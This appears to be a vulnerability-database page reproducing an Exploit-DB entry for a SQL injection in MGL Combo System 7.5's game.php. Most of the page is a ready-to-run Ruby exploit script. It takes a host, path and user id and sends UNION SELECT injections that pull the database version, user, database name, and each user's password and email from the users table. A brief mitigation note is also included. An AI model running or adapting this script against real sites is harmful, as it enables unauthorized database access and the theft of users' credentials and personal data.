header-logo
Suggest Exploit
vendor:
MGL Combo System
by:
Easy Laster
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: MGL Combo System
Affected Version From: <= 7.5
Affected Version To: 7.5
Patch Exists: NO
Related CWE:
CPE: a:mygamingladder:MGL_Combo_System:7.5
Metasploit:
Other Scripts:
Platforms Tested:
2010

mygamingladder MGL Combo System <= 7.5 game.php SQL injection Exploit

This is a SQL injection exploit for the mygamingladder MGL Combo System version 7.5 game.php script. It allows an attacker to inject SQL commands and potentially gain unauthorized access to the database.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users should avoid using the affected version of the script or implement input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : mygamingladder MGL Combo System <= 7.5 game.php SQL injection Exploit
+Autor : Easy Laster
+Date   : 10.10.2010
+Script  : mygamingladder MGL Combo System <= 7.5
+Price : 120$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
 
---------------------------------------------------------------------------------------
                                                                                      
 ___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 
                                              |___|                 |___|           
 
 
----------------------------------------------------------------------------------------
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
#                    4004-Security-Project              #
#########################################################
#             mygamingladder MGL Combo System 7.5       #
#                          Exploit                      #
#                     Using Host+Path+id                #
#                     www.demo.de /forum/ 1             #
#                         Easy Laster                   #
#########################################################
"
require 'net/http'
block = "#########################################################"
print ""+ block +""
print "\nEnter host name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter script path (/path/)->"
path=gets.chomp
print ""+ block +""
print "\nEnter the id (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir = "game.php?gameid=%27/**/"+
      "+union/**/+select+/**/1,"+
      "2,3,CONCAT%280x23,0x23,"+
      "0x23,0x23,0x23,version()"+
      ",0x23,0x23,0x23,0x23,0x2"+
      "3%29,5,6,7,8+/**/from+/"+
      "**/users+/**/WHERE+/**/"+
      "+id="+ userid +"--+"
       http = Net::HTTP.new(host, 80)
       resp= http.get(path+dir)
       print "\nVersion -> "+(/#####(.+)#####/).match(resp.body)[1]
         dir = "game.php?gameid=%27/**/"+
         "+union/**/+select+/**/1,"+
         "2,3,CONCAT%280x23,0x23,"+
         "0x23,0x23,0x23,user()"+
         ",0x23,0x23,0x23,0x23,0x2"+
         "3%29,5,6,7,8+/**/from+/"+
         "**/users+/**/WHERE+/**/"+
         "+id="+ userid +"--+"
           http = Net::HTTP.new(host, 80)
           resp= http.get(path+dir)
           print "\nUser -> "+(/#####(.+)#####/).match(resp.body)[1]
           dir = "game.php?gameid=%27/**/"+
           "+union/**/+select+/**/1,"+
           "2,3,CONCAT%280x23,0x23,"+
           "0x23,0x23,0x23,database()"+
           ",0x23,0x23,0x23,0x23,0x2"+
           "3%29,5,6,7,8+/**/from+/"+
           "**/users+/**/WHERE+/**/"+
           "+id="+ userid +"--+"
              http = Net::HTTP.new(host, 80)
              resp= http.get(path+dir)
              print "\nDatabase -> "+(/#####(.+)#####/).match(resp.body)[1]
              dir = "game.php?gameid=%27/**/"+
           "+union/**/+select+/**/1,"+
           "2,3,CONCAT%280x23,0x23"+
           ",0x23,0x23,0x23,id,0x2"+
           "3,0x23,0x23,0x23,0x23%"+
           "29,5,6,7,8+/**/from+/*"+
           "*/users+/**/WHERE+/**/"+
           "id="+ userid +"--+"
        http = Net::HTTP.new(host, 80)
        resp= http.get(path+dir)
        print "\nId -> "+(/#####(.+)#####/).match(resp.body)[1]
        dir = "game.php?gameid=%27/**/"+
        "+union/**/+select+/**/1,"+
        "2,3,CONCAT%280x23,0x23"+
        ",0x23,0x23,0x23,pass,0x2"+
     "3,0x23,0x23,0x23,0x23%"+
     "29,5,6,7,8+/**/from+/*"+
     "*/users+/**/WHERE+/**/"+
     "id="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nPassword -> "+(/#####(.+)#####/).match(resp.body)[1]
     dir = "game.php?gameid=%27/**/"+
  "+union/**/+select+/**/1,"+
  "2,3,CONCAT%280x23,0x23"+
  ",0x23,0x23,0x23,email,0x2"+
  "3,0x23,0x23,0x23,0x23%"+
  "29,5,6,7,8+/**/from+/*"+
  "*/users+/**/WHERE+/**/"+
  "id="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
 resp= http.get(path+dir)
 print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
 print "\n#########################################################"
 rescue
print "\nExploit failed"
end

Navigation

Suggest Exploit

Services By CQR